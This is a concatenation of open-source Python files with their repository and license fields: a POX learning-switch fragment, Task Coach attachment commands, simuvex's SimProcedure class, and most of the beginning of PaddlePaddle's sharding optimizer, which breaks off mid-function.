print "FlowStatsReceived from %s: %s" % (dpidToStr(event.connection.dpid), stats)
class l2_learning (object):
"""
Waits for OpenFlow switches to connect and makes them learning switches.
"""
def __init__ (self, transparent):
core.openflow.addListeners(self)
self.transparent = transparent
def _handle_ConnectionUp (self, event):
log.debug("Connection %s" % (event.connection,))
LearningSwitch(event.connection, self.transparent)
def launch (transparent=False, hold_down=_flood_delay):
"""
Starts an L2 learning switch.
"""
try:
global _flood_delay
_flood_delay = int(str(hold_down), 10)
assert _flood_delay >= 0
except:
raise RuntimeError("Expected hold-down to be a number")
core.registerNew(l2_learning, str_to_bool(transparent))
| apache-2.0 |
TaskEvolution/Task-Coach-Evolution | taskcoach/taskcoachlib/command/attachmentCommands.py | 1 | 5021 | # -*- coding: utf-8 -*-
'''
Task Coach - Your friendly task manager
Copyright (C) 2004-2013 Task Coach developers <developers@taskcoach.org>
Task Coach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Task Coach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from taskcoachlib import patterns
from taskcoachlib.i18n import _
from taskcoachlib.domain import attachment
import base, noteCommands
class EditAttachmentLocationCommand(base.BaseCommand):
plural_name = _('Edit location of attachments')
singular_name = _('Edit attachment "%s" location')
def __init__(self, *args, **kwargs):
self.__newLocation = kwargs.pop('newValue')
super(EditAttachmentLocationCommand, self).__init__(*args, **kwargs)
self.__oldLocations = [item.location() for item in self.items]
@patterns.eventSource
def do_command(self, event=None):
super(EditAttachmentLocationCommand, self).do_command()
for item in self.items:
item.setLocation(self.__newLocation)
@patterns.eventSource
def undo_command(self, event=None):
super(EditAttachmentLocationCommand, self).undo_command()
for item, oldLocation in zip(self.items, self.__oldLocations):
item.setLocation(oldLocation)
def redo_command(self):
self.do_command()
class AddAttachmentCommand(base.BaseCommand):
plural_name = _('Add attachment')
singular_name = _('Add attachment to "%s"')
def __init__(self, *args, **kwargs):
self.owners = []
self.__attachments = kwargs.get('attachments',
[attachment.FileAttachment('', subject=_('New attachment'))])
super(AddAttachmentCommand, self).__init__(*args, **kwargs)
self.owners = self.items
self.items = self.__attachments
self.save_modification_datetimes()
def modified_items(self):
return self.owners
@patterns.eventSource
def addAttachments(self, event=None):
kwargs = dict(event=event)
for owner in self.owners:
owner.addAttachments(*self.__attachments, **kwargs) # pylint: disable=W0142
@patterns.eventSource
def removeAttachments(self, event=None):
kwargs = dict(event=event)
for owner in self.owners:
owner.removeAttachments(*self.__attachments, **kwargs) # pylint: disable=W0142
def do_command(self):
super(AddAttachmentCommand, self).do_command()
self.addAttachments()
def undo_command(self):
super(AddAttachmentCommand, self).undo_command()
self.removeAttachments()
def redo_command(self):
super(AddAttachmentCommand, self).redo_command()
self.addAttachments()
class RemoveAttachmentCommand(base.BaseCommand):
plural_name = _('Remove attachment')
singular_name = _('Remove attachment to "%s"')
def __init__(self, *args, **kwargs):
self._attachments = kwargs.pop('attachments')
super(RemoveAttachmentCommand, self).__init__(*args, **kwargs)
@patterns.eventSource
def addAttachments(self, event=None):
kwargs = dict(event=event)
for item in self.items:
item.addAttachments(*self._attachments, **kwargs) # pylint: disable=W0142
@patterns.eventSource
def removeAttachments(self, event=None):
kwargs = dict(event=event)
for item in self.items:
item.removeAttachments(*self._attachments, **kwargs) # pylint: disable=W0142
def do_command(self):
super(RemoveAttachmentCommand, self).do_command()
self.removeAttachments()
def undo_command(self):
super(RemoveAttachmentCommand, self).undo_command()
self.addAttachments()
def redo_command(self):
super(RemoveAttachmentCommand, self).redo_command()
self.removeAttachments()
class CutAttachmentCommand(base.CutCommandMixin, RemoveAttachmentCommand):
def itemsToCut(self):
return self._attachments
def sourceOfItemsToCut(self):
class Wrapper(object):
def __init__(self, items):
self.__items = items
def extend(self, attachments):
for item in self.__items:
item.addAttachments(*attachments)
def removeItems(self, attachments):
for item in self.__items:
item.removeAttachments(*attachments)
return Wrapper(self.items)
| gpl-3.0 |
zhuyue1314/simuvex | simuvex/s_procedure.py | 1 | 9027 | #!/usr/bin/env python
import inspect
import itertools
import logging
l = logging.getLogger(name = "simuvex.s_procedure")
symbolic_count = itertools.count()
from .s_run import SimRun
from .s_cc import DefaultCC
class SimProcedure(SimRun):
ADDS_EXITS = False
NO_RET = False
local_vars = ()
def __init__(self, state, ret_to=None, stmt_from=None, convention=None, arguments=None, sim_kwargs=None, run_func_name='run', **kwargs):
self.kwargs = { } if sim_kwargs is None else sim_kwargs
SimRun.__init__(self, state, **kwargs)
self.state.scratch.bbl_addr = self.addr
self.stmt_from = -1 if stmt_from is None else stmt_from
self.arguments = arguments
self.ret_to = ret_to
self.ret_expr = None
self.symbolic_return = False
self.state.scratch.sim_procedure = self.__class__.__name__
self.run_func_name = run_func_name
# types
self.argument_types = { } # a dictionary of index-to-type (i.e., type of arg 0: SimTypeString())
self.return_type = None
# calling convention
self.cc = None
self.set_convention(convention)
# prepare and run!
if o.AUTO_REFS not in self.state.options:
cleanup_options = True
self.state.options.add(o.AST_DEPS)
self.state.options.add(o.AUTO_REFS)
else:
cleanup_options = False
run_spec = inspect.getargspec(self.run)
num_args = len(run_spec.args) - (len(run_spec.defaults) if run_spec.defaults is not None else 0) - 1
args = [ self.arg(_) for _ in xrange(num_args) ]
run_func = getattr(self, run_func_name)
r = run_func(*args, **self.kwargs)
if r is not None:
self.ret(r)
if o.FRESHNESS_ANALYSIS in self.state.options:
self.state.scratch.update_ignored_variables()
if cleanup_options:
self.state.options.discard(o.AST_DEPS)
self.state.options.discard(o.AUTO_REFS)
def run(self, *args, **kwargs): #pylint:disable=unused-argument
raise SimProcedureError("%s does not implement a run() method" % self.__class__.__name__)
def reanalyze(self, new_state=None, addr=None, stmt_from=None, convention=None):
new_state = self.initial_state.copy() if new_state is None else new_state
addr = self.addr if addr is None else addr
stmt_from = self.stmt_from if stmt_from is None else stmt_from
cc = self.cc if convention is None else convention
return self.__class__(new_state, addr=addr, stmt_from=stmt_from, convention=cc, sim_kwargs=self.kwargs) #pylint:disable=E1124,E1123
def initialize_run(self):
pass
def handle_run(self):
self.handle_procedure()
def handle_procedure(self):
raise Exception("SimProcedure.handle_procedure() has been called. This should have been overwritten in class %s.", self.__class__)
def set_convention(self, convention=None):
if convention is None:
# default conventions
if self.state.arch.name in DefaultCC:
self.cc = DefaultCC[self.state.arch.name](self.state.arch)
else:
raise SimProcedureError('There is no default calling convention for architecture %s.' +
' You must specify a calling convention.',
self.state.arch.name)
else:
self.cc = convention
def set_args(self, args):
self.cc.set_args(self.state, args)
# Returns a bitvector expression representing the nth argument of a function
def arg(self, index):
if self.arguments is not None:
r = self.arguments[index]
else:
r = self.cc.arg(self.state, index)
l.debug("returning argument")
return r
def inline_call(self, procedure, *arguments, **sim_kwargs):
e_args = [ self.state.BVV(a, self.state.arch.bits) if isinstance(a, (int, long)) else a for a in arguments ]
p = procedure(self.state, inline=True, arguments=e_args, sim_kwargs=sim_kwargs)
return p
# Sets an expression as the return value. Also updates state.
def set_return_expr(self, expr):
if isinstance(expr, (int, long)):
expr = self.state.BVV(expr, self.state.arch.bits)
if o.SIMPLIFY_RETS in self.state.options:
l.debug("... simplifying")
l.debug("... before: %s", expr)
expr = self.state.se.simplify(expr)
l.debug("... after: %s", expr)
if self.symbolic_return:
size = len(expr)
new_expr = self.state.se.Unconstrained("multiwrite_" + self.__class__.__name__, size) #pylint:disable=maybe-no-member
self.state.add_constraints(new_expr == expr)
expr = new_expr
if self.arguments is not None:
self.ret_expr = expr
return
else:
self.cc.set_return_expr(self.state, expr)
# Adds an exit representing the function returning. Modifies the state.
def ret(self, expr=None):
if expr is not None: self.set_return_expr(expr)
if self.arguments is not None:
l.debug("Returning without setting exits due to 'internal' call.")
return
elif self.ret_to is not None:
self.state.log.add_action(SimActionExit(self.state, self.ret_to))
self.add_successor(self.state, self.ret_to, self.state.se.true, 'Ijk_Ret')
else:
if self.cleanup:
self.state.options.discard(o.AST_DEPS)
self.state.options.discard(o.AUTO_REFS)
ret_irsb = self.state.arch.disassemble_vex(self.state.arch.ret_instruction, mem_addr=self.addr)
ret_simirsb = SimIRSB(self.state, ret_irsb, inline=True, addr=self.addr)
if not ret_simirsb.flat_successors + ret_simirsb.unsat_successors:
ret_state = ret_simirsb.default_exit
else:
ret_state = (ret_simirsb.flat_successors + ret_simirsb.unsat_successors)[0]
if self.cleanup:
self.state.options.add(o.AST_DEPS)
self.state.options.add(o.AUTO_REFS)
self.add_successor(ret_state, ret_state.scratch.target, ret_state.scratch.guard, ret_state.scratch.jumpkind)
def call(self, addr, args, continue_at, cc=None):
if cc is None:
cc = self.cc
call_state = self.state.copy()
ret_addr = self.state.BVV(self.state.procedure_data.hook_addr, self.state.arch.bits)
saved_local_vars = zip(self.local_vars, map(lambda name: getattr(self, name), self.local_vars))
simcallstack_entry = (self.__class__, continue_at, cc.stack_space(self.state, args), saved_local_vars, self.kwargs)
cc.setup_callsite(call_state, ret_addr, args)
call_state.procedure_data.callstack.append(simcallstack_entry)
if call_state.libc.ppc64_abiv == 'ppc64_1':
call_state.regs.r2 = self.state.mem[addr + 8:].long.resolved
addr = call_state.mem[addr:].long.resolved
elif call_state.arch.name in ('MIPS32', 'MIPS64'):
call_state.regs.t9 = addr
self.add_successor(call_state, addr, call_state.se.true, 'Ijk_Call')
if o.DO_RET_EMULATION in self.state.options:
ret_state = self.state.copy()
cc.setup_callsite(ret_state, ret_addr, args)
ret_state.procedure_data.callstack.append(simcallstack_entry)
guard = ret_state.se.true if o.TRUE_RET_EMULATION_GUARD in ret_state.options else ret_state.se.false
self.add_successor(ret_state, ret_addr, guard, 'Ijk_FakeRet')
def jump(self, addr):
self.add_successor(self.state, addr, self.state.se.true, 'Ijk_Boring')
def ty_ptr(self, ty):
return SimTypePointer(self.state.arch, ty)
def __repr__(self):
if self._custom_name is not None:
return "<SimProcedure %s>" % self._custom_name
else:
return "<SimProcedure %s>" % self.__class__.__name__
class SimProcedureContinuation(SimProcedure):
def __new__(cls, state, *args, **kwargs):
# pylint: disable=bad-super-call
if len(state.procedure_data.callstack) == 0:
raise SimProcedureError("Tried to run simproc continuation with empty stack")
newstate = state.copy()
cls, continue_at, stack_space, saved_local_vars, saved_kwargs = newstate.procedure_data.callstack.pop()
newstate.regs.sp += stack_space
self = object.__new__(cls)
for name, val in saved_local_vars:
setattr(self, name, val)
kwargs['sim_kwargs'] = saved_kwargs
self.__init__(newstate, *args, run_func_name=continue_at, **kwargs)
return self
from . import s_options as o
from .s_errors import SimProcedureError
from .vex.irsb import SimIRSB
from .s_type import SimTypePointer
from .s_action import SimActionExit
| bsd-2-clause |
luotao1/Paddle | python/paddle/distributed/fleet/meta_optimizers/sharding_optimizer.py | 1 | 65621 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
from paddle.fluid import unique_name, core
import paddle.fluid as fluid
from paddle.distributed.fleet.meta_optimizers.common import OpRole, OP_ROLE_VAR_KEY, CollectiveHelper
from paddle.distributed.fleet.meta_optimizers.common import is_backward_op, is_optimizer_op, is_update_op
from paddle.distributed.fleet.meta_optimizers.meta_optimizer_base import MetaOptimizerBase
from paddle.distributed.fleet.meta_optimizers.sharding.shard import Shard, ProgramSegment
from paddle.distributed.fleet.meta_optimizers.sharding.fp16_helper import FP16Utils
from paddle.distributed.fleet.meta_optimizers.sharding.weight_decay_helper import WeightDecayHelper
from paddle.distributed.fleet.meta_optimizers.sharding.gradient_clip_helper import GradientClipHelper
from .sharding.offload_helper import OffloadHelper
from paddle.distributed.fleet.meta_optimizers.sharding.prune import ProgramDeps
from paddle.distributed.fleet.meta_optimizers.sharding.utils import *
from paddle.fluid.framework import Program, Variable, name_scope, default_main_program, default_startup_program, device_guard
from paddle.fluid import layers
import logging
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
from functools import reduce
__all__ = ["ShardingOptimizer"]
class ShardingOptimizer(MetaOptimizerBase):
"""Sharding Optimizer."""
def __init__(self, optimizer):
super(ShardingOptimizer, self).__init__(optimizer)
self.inner_opt = optimizer
self.meta_optimizers_white_list = [
"RecomputeOptimizer",
"AMPOptimizer",
"LarsOptimizer",
"LambOptimizer",
# "ModelParallelOptimizer",
# "PipelineOptimizer",
]
self.meta_optimizers_black_list = ["GraphExecutionOptimizer", ]
self._main_program = None
self._startup_program = None
self._segments = []
# params and fp16 params is for broadcast
self._params = set([])
self._broadcast_vars = set([])
# reduced grads to param name
self._reduced_grads_to_param = {}
self._shard = Shard()
self._verbose = False
# use sharding as outer parallelism (e.g. inner:Megatron & outer sharding)
self.mp_degree = 1
def _can_apply(self):
if not self.role_maker._is_collective:
return False
if self.role_maker._worker_num() <= 1:
return False
return self.user_defined_strategy.sharding
def _disable_strategy(self, dist_strategy):
dist_strategy.sharding = False
dist_strategy.sharding_configs = {}
def _enable_strategy(self, dist_strategy, context):
dist_strategy.sharding = True
dist_strategy.sharding_configs = {"segment_broadcast_MB": 32}
def minimize_impl(self,
loss,
startup_program=None,
parameter_list=None,
no_grad_set=None):
# TODO: (JZ-LIANG) support multiple comm in future
# self._nrings = self.user_defined_strategy.nccl_comm_num
self._nrings_sharding = 1
self._nrings_dp = 1
# segment
self._sharding_segment_strategy = str(
self.user_defined_strategy.sharding_configs[
"sharding_segment_strategy"])
if self._sharding_segment_strategy == "segment_broadcast_MB":
self._broadcast_MB = self.user_defined_strategy.sharding_configs[
"segment_broadcast_MB"]
assert self._broadcast_MB > 0, "segment size should larger than zero !"
elif self._sharding_segment_strategy == "segment_anchors":
self._sharding_segment_anchors = self.user_defined_strategy.sharding_configs[
"segment_anchors"]
assert len(self._sharding_segment_anchors
) > 0, "you should set the sharding segment anchors !"
self._backward_remain_anchors = self._sharding_segment_anchors[:]
self._forward_remain_anchors = []
else:
raise NotImplementedError(
"the sharding segment strategy [{}] is not implemented".format(
str(self._sharding_segment_strategy)))
# parallelism
self.sharding_degree = int(self.user_defined_strategy.sharding_configs[
"sharding_degree"])
assert self.sharding_degree > 0, "sharding degree must be larger than zero"
self.mp_degree = int(self.user_defined_strategy.sharding_configs[
"mp_degree"])
# pipeline setting
# TODO (JZ-LIANG) should revise here for support mix parallelism with pipeline
self.pp_degree = int(self.user_defined_strategy.sharding_configs[
"pp_degree"])
if self.pp_degree > 1:
assert self.user_defined_strategy.pipeline == True
self.dp_degree = int(self.user_defined_strategy.sharding_configs[
'dp_degree'])
assert self.role_maker._worker_num(
) == self.mp_degree * self.sharding_degree * self.pp_degree * self.dp_degree, "global work size [{}], mp_degree [{}], sharding_degree [{}], pp_degree [{}], dp_degree [{}].".format(
self.role_maker._worker_num(),
self.mp_degree,
self.sharding_degree,
self.pp_degree,
self.dp_degree, )
# FIXME (JZ-LIANG) deprecated hybrid_dp
if self.user_defined_strategy.sharding_configs["hybrid_dp"]:
logging.warning(
"[hybrid_dp] API setting is deprecated. Now when dp_degree >= 2, its will be in hybrid dp mode automatically"
)
assert self.dp_degree >= 1
if self.dp_degree > 1:
self.hybrid_dp = True
else:
self.hybrid_dp = False
# NOTE (JZ-LIANG)
# there 2 kind of modes for gradient-merge and hybrid-dp in mixed parallism [sharding] and [pipeline].
# we distinguish this two modes since the gm/hybrid-dp related allreduce should be insert in different place according different mode to have best performance:
# sharding: communication within node, and therefore should insert within backward segment to overlap with bw calc, conduct every micro step
# pipeline: communication accross nodes, and therefore should insert in update segemnt, conduct just once per global step
self.hybrid_dp_mode = None
# dp here is the pure dp as the outest parallelism
if self.hybrid_dp:
assert self.dp_degree > 1, "hybrid dp is on, but dp degree is [{}]".format(
self.dp_degree)
if self.pp_degree > 1:
self.hybrid_dp_mode = "pp_hybrid_dp"
else:
assert self.sharding_degree > 1, "by now we only support five kind of hybrid dp: sharding_hybrid_dp, mp_sharding_hybrid_dp, pp_hybrid_dp, mp_sharding_pp_hybrid_dp, sharding_pp_hybrid_dp."
self.hybrid_dp_mode = "sharding_hybrid_dp"
# gradient merge
self._gradient_merge_acc_step = int(
self.user_defined_strategy.sharding_configs[
"gradient_merge_acc_step"])
self.gradient_merge_mode = None
if self.pp_degree <= 1:
self.gradient_merge_mode = "sharding_gm"
self._grad2merged_grad = dict()
else:
self.gradient_merge_mode = "pp_gm"
self._gradient_merge_acc_step = self.user_defined_strategy.pipeline_configs[
'accumulate_steps']
if self._gradient_merge_acc_step > 1:
logging.info("Gradient merge in [{}], acc step = [{}]".format(
self.gradient_merge_mode, self._gradient_merge_acc_step))
# optimize offload
self.optimize_offload = self.user_defined_strategy.sharding_configs[
"optimize_offload"]
# this feature is design for ascend, and should NOT be used in GPU training
self.pp_allreduce_in_optimize = self.user_defined_strategy.sharding_configs[
"pp_allreduce_in_optimize"]
if self.inner_opt is None:
raise ValueError(
"self.inner_opt of ShardingOptimizer should not be None.")
if self.pp_degree > 1:
pp_optimizer = fluid.optimizer.PipelineOptimizer(
self.inner_opt, self._gradient_merge_acc_step)
main_program = loss.block.program
main_program._pipeline_opt = dict()
self.schedule_mode = self.user_defined_strategy.pipeline_configs[
'schedule_mode']
main_program._pipeline_opt['schedule_mode'] = self.schedule_mode
main_program._pipeline_opt[
'micro_batch_size'] = self.user_defined_strategy.pipeline_configs[
'micro_batch_size']
self.pp_rank_ = self.role_maker._worker_index() // (
self.sharding_degree * self.mp_degree) % self.pp_degree
main_program._pipeline_opt['local_rank'] = self.pp_rank_
main_program._pipeline_opt[
'global_rank'] = self.role_maker._worker_index()
main_program._pipeline_opt['use_sharding'] = True
# TODO (JZ-LIANG) should revise here for support mix parallelism with pipeline
main_program._pipeline_opt['ring_id'] = 20
main_program._pipeline_opt['global_ring_id'] = 3
optimize_ops, params_grads, program_list, self.pipeline_pair, self.pp_ring_map = pp_optimizer.minimize(
loss, startup_program, parameter_list, no_grad_set)
self.pp_degree = len(program_list)
else:
optimize_ops, params_grads = self.inner_opt.minimize(
loss, startup_program, parameter_list, no_grad_set)
if startup_program is None:
startup_program = default_startup_program()
if self.pp_degree > 1:
startup_program = startup_program._pipeline_opt['startup_program']
#main_program = main_program._pipeline_opt['section_program']['program']
print("pp_rank:", self.pp_rank_)
main_program = program_list[self.pp_rank_]
with open("main_%d" % self.role_maker._worker_index(), 'w') as f:
f.writelines(str(main_program))
main_block = main_program.global_block()
new_params_grads = []
for param, grad in params_grads:
if main_block.has_var(param.name):
new_params_grads.append((param, grad))
params_grads = new_params_grads
else:
main_block = loss.block
startup_block = startup_program.global_block()
self._main_program = main_block.program
self._startup_program = startup_program
if self.pp_degree > 1:
pp_optimizer._rename_gradient_var_name(main_block)
with open("main_%d" % self.role_maker._worker_index(), 'w') as f:
f.writelines(str(main_program))
# step0: _init_comm
self._init_comm()
if self.sharding_degree > 1:
# step1: build shard
self._build_shard(params_grads)
# step2: split_program
self._split_program(main_block)
# step3: add broadcast and reduce ops
self._add_broadcast_allreduce(main_block)
main_block._sync_with_cpp()
startup_block._sync_with_cpp()
main_block._sync_with_cpp()
# step4: remove unneeded ops and vars from block
self._prune_main_program(main_block)
self._prune_startup_program(startup_block)
if self.pp_degree > 1:
# sharding-pp related logic
# pp_optimizer._rename_gradient_var_name(main_block)
# crop ops
if self.sharding_degree > 1:
for idx, op in reversed(list(enumerate(main_block.ops))):
if is_update_op(op):
op_role_var = op.attr('op_role_var')
param_name = op_role_var[0]
if not self._shard.has_param(param_name):
main_block._remove_op(idx)
for idx, op in reversed(list(enumerate(main_block.ops))):
if op.type != 'cast': continue
in_name = op.input_arg_names[0]
if in_name not in self._params: continue
#if self._shard.has_param(param_name): continue
if in_name not in main_block.vars:
main_block._remove_op(idx)
accumulated_grad_names = pp_optimizer._accumulate_gradients(
main_block)
# accumulated_grad_names = sorted(accumulated_grad_names)
if self.pp_allreduce_in_optimize:
print("persistable FP32 grad: ")
print(accumulated_grad_names)
first_optimize_op_index = get_first_check_finite_and_unscale_op_idx(
main_block)
insert_reduce_ops(
main_block,
first_optimize_op_index,
self.sharding_ring_id,
accumulated_grad_names,
self._shard,
core.op_proto_and_checker_maker.OpRole.Optimize,
use_calc_stream=True)
if self.hybrid_dp and self.hybrid_dp_mode == "pp_hybrid_dp":
first_optimize_op_index = get_first_check_finite_and_unscale_op_idx(
main_block)
insert_allreduce_ops(
main_block,
first_optimize_op_index,
self.dp_ring_id,
accumulated_grad_names,
core.op_proto_and_checker_maker.OpRole.Optimize,
use_calc_stream=True)
# if not use sharding, adapt amp/clip, for remain parallelism.
# cast --> amp --> clip --> opt
if self.sharding_degree <= 1:
# amp
FP16Utils.sync_amp_check_nan_inf(main_block, self.global_ring_id)
# clip
gradientclip_helper = GradientClipHelper(self.global_ring_id)
gradientclip_helper.sync_global_norm(
main_block, self.global_ring_id, self.dp_degree)
# step6: loss div dp_degree
global_dp_degree = self.sharding_degree * self.dp_degree
assert int(global_dp_degree) == global_dp_degree
if global_dp_degree > 1:
insert_scale_loss_grad_ops(main_block, scale=1.0 / global_dp_degree)
main_block._sync_with_cpp()
# TODO(wangxi): add optimize offload
# opt offload should be enable while gradient merge is enable && acc_step is quite large (e.g. >> 100)
# sync its memcpy could not be overlap with calc, otherwise it will slower down training severely.
if self.optimize_offload:
logging.info("Sharding with optimize offload !")
offload_helper = OffloadHelper()
offload_helper.offload(main_block, startup_block)
offload_helper.offload_fp32param(main_block, startup_block)
# step6: (optional) sharding gradient merge
if self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
self._sharding_gradient_merge(main_block)
# # check op dependecy
# FIXME (JZ-LIANG) enable checking in future.
# check_broadcast(main_block)
# check_allreduce_sum(main_block, self._shard, self.sharding_ring_id,
# self.dp_ring_id)
if self.hybrid_dp:
# NOTE(JZ-LIANG) ensure in both sharding_hybrid_dp & pp_hybrid_dp
# init param broadcast should be called after startup pruning
self._initialization_broadcast(startup_block)
with open("start_sharding_%d" % self.role_maker._worker_index(),
'w') as f:
f.writelines(str(startup_block.program))
with open("main_sharding_%d" % self.role_maker._worker_index(),
'w') as f:
f.writelines(str(main_block.program))
self._wait()
return optimize_ops, params_grads
def _init_comm(self):
# config sharding & dp groups
self._build_groups()
# sync var
startup_block = self._startup_program.global_block()
self.startup_prog_sync_var = startup_block.create_var(
name="startup_prog_sync_var",
shape=[1],
dtype=core.VarDesc.VarType.INT32,
persistable=False)
# global ring
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.global_endpoints,
self.global_rank,
self.global_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# mp ring
if self.mp_degree > 1:
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.mp_group_endpoints,
self.mp_rank,
self.mp_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# sharding ring
if self.sharding_degree > 1:
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.sharding_group_endpoints,
self.sharding_rank,
self.sharding_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# pp ring
if self.pp_degree > 1:
if self.schedule_mode == 'F-then-B': # GPipe
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.pp_group_endpoints,
self.pp_rank,
self.pp_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
# append_naive_sync(startup_block, self.startup_prog_sync_var,
# self.global_ring_id)
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.pp_group_endpoints,
self.pp_rank,
self.pp_ring_id + 2,
False,
global_ring_id=self.global_ring_id,
sync=False)
# append_naive_sync(startup_block, self.startup_prog_sync_var,
# self.global_ring_id)
else:
assert self.schedule_mode == '1F1B'
for pair in self.pipeline_pair:
pair_key = pair[0] * 1000 + pair[1]
ring_id = self.pp_ring_map[pair_key]
print("pp pair:{}, ring_id: {}".format(pair, ring_id))
if self.pp_rank not in pair: continue
pp_group_endpoints = [
self.pp_group_endpoints[pair[0]],
self.pp_group_endpoints[pair[1]],
]
if pair[0] < pair[1]:
start_ring_id = self.pp_ring_id + pair[1] - pair[0] - 1
else:
start_ring_id = self.pp_ring_id + 2 + pair[0] - pair[
1] - 1
pp_rank = 0 if self.pp_rank == pair[0] else 1
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
pp_group_endpoints,
pp_rank,
ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
# append_naive_sync(startup_block, self.startup_prog_sync_var,
# self.global_ring_id)
# TODO (JZ-LIANG) to unify this shit
assert self.pp_rank_ == self.pp_rank, "pp rank for pp opt [{}], pp rank for sharding opt [{}]".format(
self.pp_rank_, self.pp_rank)
# pure dp ring
if self.dp_degree > 1:
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.dp_group_endpoints,
self.dp_rank,
self.dp_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
startup_block._sync_with_cpp()
def _build_shard(self, params_grads):
# step 2: split params
self._params = set([x[0].name for x in params_grads])
self._shard.setup(params_grads, self.sharding_rank,
self.sharding_degree)
# step 3: get broadcast vars
self._broadcast_vars = self._shard.find_broadcast_params(
self._main_program.global_block())
def _wait(self, ):
endpoints = self.global_endpoints[:]
current_endpoint = endpoints[self.global_rank]
if self.global_rank == 0:
self._collective_helper._wait(current_endpoint, endpoints)
def collect_segment(self, segment, op_idx, block):
segment._start_idx = op_idx + 1
self._segments.insert(0, segment)
new_segment = ProgramSegment(block)
new_segment._end_idx = op_idx + 1
return new_segment
def _split_program(self, block):
for op_idx, op in reversed(list(enumerate(block.ops))):
if int(op.attr('op_role')) != int(OpRole.Optimize):
last_backward_op_idx = op_idx + 1
break
var2broadcast_time = dict()
segment = ProgramSegment(block)
segment._end_idx = last_backward_op_idx
for op_idx in reversed(range(last_backward_op_idx)):
op = block.ops[op_idx]
assert (int(op.attr('op_role')) != int(OpRole.Optimize))
if self._sharding_segment_strategy == "segment_broadcast_MB":
if segment._param_mem >= self._broadcast_MB:
segment = self.collect_segment(segment, op_idx, block)
elif self._sharding_segment_strategy == "segment_anchors":
if int(op.attr('op_role')) == int(OpRole.Backward):
for input_name in op.desc.input_arg_names():
# NOTE (JZ-LIANG) naive rule to support amp, if amp change, should modify here accordingly
if self.user_defined_strategy.amp:
if ".cast_fp16@GRAD" not in input_name:
continue
else:
input_name = input_name[:input_name.find(
".cast_fp16@GRAD")]
if input_name in self._backward_remain_anchors:
segment = self.collect_segment(segment, op_idx,
block)
assert input_name not in self._forward_remain_anchors, "segment anchor [{}] met twice !".format(
input_name)
self._backward_remain_anchors.remove(input_name)
self._forward_remain_anchors.append(input_name)
elif int(op.attr('op_role')) == int(OpRole.Forward):
for output_name in op.desc.output_arg_names():
if output_name in self._forward_remain_anchors:
segment = self.collect_segment(segment, op_idx,
block)
self._forward_remain_anchors.remove(output_name)
# find broadcast vars
for input_name in op.desc.input_arg_names():
if input_name not in self._broadcast_vars:
continue
if input_name in segment._param2broadcast:
# skip broadcast because it reuse the old broadcast var
broadcast_name = segment._param2broadcast[input_name]
if input_name != broadcast_name:
op._rename_input(input_name, broadcast_name)
continue
if self._shard.has_param(input_name):
broadcast_var_name = input_name
else:
broadcast_var_name = unique_name.generate(input_name +
"@BroadCast")
segment._fill_constant_vars.append(broadcast_var_name)
# (JZ-LIANG) should use Param base name ?
broadcast_var_base_name = input_name
if "subprog" in broadcast_var_base_name:
# remove suffix
broadcast_var_base_name = broadcast_var_base_name[:
broadcast_var_base_name.
find(
".subprog"
)]
var2broadcast_time[
broadcast_var_base_name] = var2broadcast_time.get(
broadcast_var_base_name, 0) + 1
segment._param2broadcast[input_name] = broadcast_var_name
segment._broadcast_vars.append((broadcast_var_name,
self._shard.device(input_name)))
segment._param_mem += get_var_size(
self._main_program.global_block().var(input_name))
# find reduce vars
if self.pp_degree > 1 and self.pp_allreduce_in_optimize:
# place pipeline gradient allreduce in optimize
pass
else:
if is_backward_op(op) and \
OP_ROLE_VAR_KEY in op.attr_names:
op_role_var = op.all_attrs()[OP_ROLE_VAR_KEY]
if len(op_role_var) != 0:
assert len(op_role_var) % 2 == 0
for i in range(0, len(op_role_var), 2):
param, reduced_grad = op_role_var[i], op_role_var[
i + 1]
segment._allreduce_vars.append(reduced_grad)
assert (reduced_grad not in
self._reduced_grads_to_param)
self._reduced_grads_to_param[reduced_grad] = param
# find cast op
if FP16Utils.is_fp16_cast_op(block, op, self._params):
fp32_param = op.desc.input_arg_names()[0]
fp16_param = op.desc.output_arg_names()[0]
if self._shard.has_param(fp32_param):
segment._cast_ops[fp16_param] = fp32_param
if segment._param_mem > 0:
segment._start_idx = 0
self._segments.insert(0, segment)
if self._sharding_segment_strategy == "segment_anchors":
assert len(
self._forward_remain_anchors) == 0, "remain anchors {}".format(
self._forward_remain_anchors)
assert len(
self._backward_remain_anchors) == 0, "remain anchors {}".format(
self._backward_remain_anchors)
if self._verbose:
for varname in sorted(
